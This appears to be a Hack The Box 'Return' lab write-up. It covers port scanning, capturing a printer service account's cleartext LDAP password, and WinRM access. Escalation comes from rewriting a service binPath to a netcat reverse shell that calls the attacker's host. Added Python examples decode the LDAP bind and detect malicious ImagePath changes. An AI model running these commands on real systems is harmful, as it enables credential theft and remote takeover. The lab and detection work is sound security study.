❯ nmap -sS -Pn -n -vvv --open --min-rate 5000 10.10.11.108 -oG port
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
80/tcp open http syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
Open ports.
❯ nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269 10.10.11.108 -oN target.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-02 01:54 EDT
Nmap scan report for 10.10.11.108
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-01 22:16:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -7h38m20s
| smb2-time:
| date: 2025-05-01T22:16:20
|_ start_date: N/A
Versions and services running on each of the ports.
We check the domain name and add it to /etc/hosts.
❯ nc -lvnp 389
listening on [any] 389 ...
connect to [10.10.14.47] from (UNKNOWN) [10.10.11.108] 49898
0*`%return\svc-printer
1edFg43012!!
We listen on the port it specifies (389, LDAP) and receive a set of credentials in clear text.
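What the listener actually received, as an added example (not part of the original writeup): the two printed strings are the printable bytes of a BER-encoded LDAP simple-bind request. The script below reconstructs the message from the page's strings (the non-printable framing bytes are assumed from RFC 4511; the two printable length octets `*` = 42 and `%` = 37 confirm them) and decodes it. The point for a defender is that a simple bind over plain LDAP puts the account password on the wire in the clear, so any integration that can be pointed at an arbitrary LDAP server needs LDAPS or StartTLS and a low-privilege account.

```python
r"""Decode an LDAP simple-bind request captured on TCP/389.

Added example for this writeup, not part of the original post. The netcat
listener printed `0*`%return\svc-printer` and, on a new line, `1edFg43012!!`:
those are the printable bytes of a BER-encoded LDAPMessage (RFC 4511) whose
non-printable framing bytes the terminal swallowed. The message below is
reconstructed from the page's two strings plus the framing bytes the encoding
requires (an assumption, but the printable length octets '*' = 42 and
'%' = 37 match exactly).
"""

CAPTURED_BIND = (
    b"\x30\x2a"                         # LDAPMessage SEQUENCE, 42 bytes follow ('0*')
    b"\x02\x01\x01"                     # messageID INTEGER 1
    b"\x60\x25"                         # [APPLICATION 0] BindRequest, 37 bytes follow ('`%')
    b"\x02\x01\x03"                     # version INTEGER 3
    b"\x04\x12" b"return\\svc-printer"  # name OCTET STRING, 18 bytes
    b"\x80\x0c" b"1edFg43012!!"         # authentication [0] simple, 12 bytes, clear text
)


def read_tlv(buf: bytes, pos: int) -> tuple[int, bytes, int]:
    """Parse one BER tag-length-value at pos; returns (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                   # long form: low 7 bits = number of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated element")
    return tag, buf[pos:pos + length], pos + length


def decode_bind_request(msg: bytes) -> dict:
    """Decode an LDAPMessage carrying a BindRequest (RFC 4511 section 4.2)."""
    tag, body, _ = read_tlv(msg, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, mid, pos = read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, op, _ = read_tlv(body, pos)
    if tag != 0x60:
        raise ValueError(f"protocolOp tag 0x{tag:02x} is not a BindRequest")
    _, ver, pos = read_tlv(op, 0)
    _, name, pos = read_tlv(op, pos)
    auth_tag, auth, _ = read_tlv(op, pos)
    result = {
        "message_id": int.from_bytes(mid, "big"),
        "version": int.from_bytes(ver, "big"),
        "name": name.decode("utf-8", "replace"),
        # [0] simple = cleartext password; [3] sasl = mechanism + credentials.
        "auth": {0x80: "simple", 0xA3: "sasl"}.get(auth_tag, f"0x{auth_tag:02x}"),
        "password": None,
    }
    if auth_tag == 0x80:
        result["password"] = auth.decode("utf-8", "replace")
    return result


def printable_bytes(msg: bytes) -> str:
    """What a terminal shows of the raw message: only the printable bytes.

    The password's length octet 0x0c is also ASCII form feed, which is the
    likely reason the password landed on its own line in the capture.
    """
    return "".join(chr(b) for b in msg if 32 <= b < 127)


if __name__ == "__main__":
    print("terminal view:", printable_bytes(CAPTURED_BIND))
    for key, value in decode_bind_request(CAPTURED_BIND).items():
        print(f"{key:>11}: {value}")
```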
ldapdomaindump
❯ ldapdomaindump -u 'return.local\svc-printer' -p '1edFg43012!!' 10.10.11.108 -o ldap
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
❯ cd ldap
❯ pwd
/home/kali/Desktop/HackTheBox/Return/content/ldap
We dump the DC to get an overall picture and serve the output with a python3 web server to browse it.
We see few users, and the one whose credentials we have is a member of Remote Management Users.
❯ evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ..//Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> more user.txt
f68366c75611129ee26d5ca9c57ed667
*Evil-WinRM* PS C:\Users\svc-printer\Desktop>
We connect and obtain the first flag.
Privilege Escalation
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer
User name svc-printer
Full Name SVCPrinter
Comment Service Account for Printer
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/26/2021 1:15:13 AM
Password expires Never
Password changeable 5/27/2021 1:15:13 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/1/2025 3:26:29 PM
Logon hours allowed All
Local Group Memberships *Print Operators *Remote Management Use
*Server Operators
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-printer\Documents>
Enumerating the svc-printer user, we see that it is in the Server Operators group.
A Google search reveals that members of this group can, among other things, start and stop services.
First of all we start a python3 web server and, from the target machine, download nc.exe.
sc.exe config WdNisSvc binPath="C:\temp\nc.exe -e cmd 10.10.14.47 443"
sc.exe config VMTools binPath="C:\temp\nc.exe -e cmd 10.10.14.47 443"
sc.exe stop VMTools
sc.exe start VMTools
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.47] from (UNKNOWN) [10.10.11.108] 49991
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
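The Server Operators step above works by rewriting a service's binPath, which lives in the registry as HKLM\System\CurrentControlSet\Services\<svc>\ImagePath, and then restarting the service. As an added example (not part of the original writeup), the script below shows the detection logic a defender would run over that write: Windows' own System log does not record a binPath change (Event ID 7040 covers start-type changes only), so it assumes Sysmon Event ID 13 (RegistryEvent, value set) records or an equivalent SACL on the Services key. The records are constructed to mirror the commands on the page; the field names are Sysmon's, everything else is assumed.

```python
r"""Flag service ImagePath changes that point at untrusted executables.

Added example for this writeup, not part of the original post. Input is a
list of constructed Sysmon Event ID 13 (value set) records with the field
names Sysmon uses (EventID, Image, TargetObject, Details). A write is
flagged when the new executable is outside the trusted program directories
or when the new value embeds an IPv4 address, which a legitimate service
command line almost never does.
"""
import re

SERVICE_IMAGEPATH = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$", re.I)
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed Sysmon Event ID 13 records, a minimal subset of fields.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\WdNisSvc\ImagePath",
     "Details": r"C:\temp\nc.exe -e cmd 10.10.14.47 443"},
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VMTools\ImagePath",
     "Details": r"C:\temp\nc.exe -e cmd 10.10.14.47 443"},
    # Benign: a quoted vendor path under Program Files (constructed).
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VMTools\ImagePath",
     "Details": r'"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"'},
    # Benign: a shared-host service using an environment-variable path.
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Dhcp\ImagePath",
     "Details": r"%SystemRoot%\system32\svchost.exe -k LocalServiceNetworkRestricted -p"},
    # Not an ImagePath write: ignored.
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Spooler\Start",
     "Details": "DWORD (0x00000002)"},
]


def extract_exe(details: str) -> str:
    """Return the executable portion of an ImagePath value.

    Handles a quoted path, an unquoted path with spaces ending in .exe,
    and a bare first token.
    """
    details = details.strip()
    if details.startswith('"'):
        end = details.find('"', 1)
        return details[1:end] if end > 0 else details[1:]
    m = re.search(r"\.exe\b", details, re.I)
    if m:
        return details[:m.end()]
    return details.split()[0] if details else ""


def normalize_path(exe: str) -> str:
    """Lower-case and expand the spellings of the Windows directory services use."""
    p = exe.lower()
    if p.startswith("\\??\\"):
        p = p[4:]
    p = p.replace("%systemroot%", "c:\\windows").replace("%windir%", "c:\\windows")
    if p.startswith("\\systemroot\\"):
        p = "c:\\windows" + p[len("\\systemroot"):]
    return p


def assess_imagepath_change(record: dict) -> list[str]:
    """Return the reasons an ImagePath write looks suspicious ([] if benign or not ImagePath)."""
    if record.get("EventID") != 13:
        return []
    if not SERVICE_IMAGEPATH.match(record.get("TargetObject", "")):
        return []
    details = record.get("Details", "")
    exe = normalize_path(extract_exe(details))
    reasons = []
    if not exe.startswith(TRUSTED_ROOTS):
        reasons.append("untrusted executable path")
    if IPV4.search(details):
        reasons.append("network address in arguments")
    return reasons


def scan(records) -> list[dict]:
    """Run the check over a batch of records and collect findings."""
    findings = []
    for rec in records:
        reasons = assess_imagepath_change(rec)
        if reasons:
            service = SERVICE_IMAGEPATH.match(rec["TargetObject"]).group(1)
            findings.append({"service": service, "image_path": rec["Details"],
                             "writer": rec.get("Image", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[!] {f['service']}: ImagePath -> {f['image_path']} ({', '.join(f['reasons'])})")
```

Note that the writing process in these records is services.exe running as SYSTEM, since sc.exe config is carried out by the Service Control Manager on the caller's behalf; the user who issued the change is only visible in the corresponding sc.exe process-creation event, so a real rule correlates the two rather than filtering on the registry writer's account. The underlying fix is to keep Server Operators empty and alert on additions to it.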